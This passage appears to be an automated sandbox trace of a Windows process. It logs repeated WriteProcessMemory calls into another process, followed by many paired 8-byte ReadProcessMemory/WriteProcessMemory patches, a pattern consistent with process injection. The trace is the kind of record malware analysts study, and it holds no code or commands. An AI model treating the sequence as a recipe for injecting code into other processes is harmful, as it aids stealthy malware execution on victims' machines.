lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0186.416] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e671000, lpBuffer=0x202b410*, nSize=0x32a00, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x202b410*, lpNumberOfBytesWritten=0x0) returned 1 [0186.933] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0186.933] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4000, lpBuffer=0x205de10*, nSize=0xdc00, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x205de10*, lpNumberOfBytesWritten=0x0) returned 1 [0188.020] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0188.020] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6b2000, lpBuffer=0x206ba10*, nSize=0x1200, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x206ba10*, lpNumberOfBytesWritten=0x0) returned 1 [0189.135] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0189.135] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6b5000, lpBuffer=0x206cc10*, nSize=0x2000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x206cc10*, lpNumberOfBytesWritten=0x0) returned 1 [0190.152] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0190.153] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6b7000, lpBuffer=0x206ec10*, nSize=0x200, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x206ec10*, lpNumberOfBytesWritten=0x0) returned 1 [0191.019] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0191.019] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6b8000, lpBuffer=0x206ee10*, nSize=0x200, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x206ee10*, lpNumberOfBytesWritten=0x0) returned 1 [0191.913] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0191.913] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6b9000, lpBuffer=0x206f010*, nSize=0x800, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x206f010*, lpNumberOfBytesWritten=0x0) returned 1 [0193.155] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="RtlCompareMemory") returned 0x7ffc5f8b8ef0 [0193.155] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="RtlCompareMemory") returned 0x7ffc5f8b8ef0 [0193.156] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="RtlCompareMemory") returned 0x7ffc5f8b8ef0 [0193.161] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="RtlCompareMemory") returned 0x7ffc5f8b8ef0 [0193.161] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="RtlCompareMemory") returned 0x7ffc5f8b8ef0 [0193.162] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="RtlCompareMemory") returned 0x7ffc5f8b8ef0 [0193.162] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="RtlCompareMemory") returned 0x7ffc5f8b8ef0 [0193.162] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0193.162] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a43b0, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0193.650] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0193.651] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a43b0, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0194.580] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0194.581] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a43b8, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0195.152] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0195.152] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a43b8, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0198.085] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0198.085] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a43c0, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0198.775] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0198.775] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a43c0, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0200.270] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0200.271] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a43c8, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0201.078] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0201.078] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a43c8, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0202.421] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0202.421] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a43d0, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0203.036] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0203.036] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a43d0, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0206.604] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0206.604] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a43e0, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0207.526] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0207.526] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a43e0, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0209.065] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0209.065] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a43f8, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0209.895] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0209.895] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a43f8, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0211.497] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0211.497] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4400, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0212.336] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0212.336] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4400, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0215.262] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0215.262] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4408, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0216.033] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0216.033] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4408, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0218.891] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0218.891] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4410, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0219.542] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0219.543] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4410, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0221.043] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0221.043] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4418, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0221.698] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0221.699] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4418, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0225.077] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0225.077] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4420, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0226.096] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0226.096] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4420, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0227.367] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0227.367] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4448, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0228.479] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0228.480] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4448, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0229.712] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0229.712] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4450, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0230.222] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0230.222] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4450, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0231.413] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0231.413] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4458, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0231.982] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0231.983] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4458, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0233.791] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0233.792] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4590, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0235.174] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0235.174] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4590, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0236.480] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0236.481] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4598, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0237.080] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0237.080] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4598, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0238.045] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0238.045] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a45a0, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0238.619] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0238.619] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a45a0, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0240.042] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0240.042] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a45a8, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0240.671] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0240.672] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a45a8, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0241.776] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0241.777] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a45b0, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0242.348] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0242.348] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a45b0, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0243.351] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0243.351] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a45d0, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0243.754] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0243.754] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a45d0, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0244.697] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0244.697] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a45d8, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0245.008] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0245.008] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a45d8, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0245.812] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0245.812] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a45e0, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0246.185] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0246.185] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a45e0, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0246.881] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0246.881] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a45f8, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0247.143] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0247.143] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a45f8, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0247.859] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0247.859] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4600, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0248.139] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0248.139] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4600, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0248.925] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0248.925] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4608, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0251.879] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0251.879] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4608, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0252.573] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0252.573] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4628, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0252.968] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0252.968] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4628, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0253.872] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0253.873] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4630, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0254.299] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0254.300] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4630, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0255.127] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0255.127] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a46f8, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0255.554] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0255.555] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a46f8, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0256.546] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0256.546] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4700, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0256.941] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0256.941] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4700, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0257.880] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0257.881] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4708, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0258.135] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0258.135] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4708, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0258.718] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0258.718] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4710, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0259.046] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0259.046] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4710, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0259.633] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0259.633] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4730, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0259.963] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0259.964] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4730, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0260.804] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0260.805] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4740, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0261.260] GetProcAddress 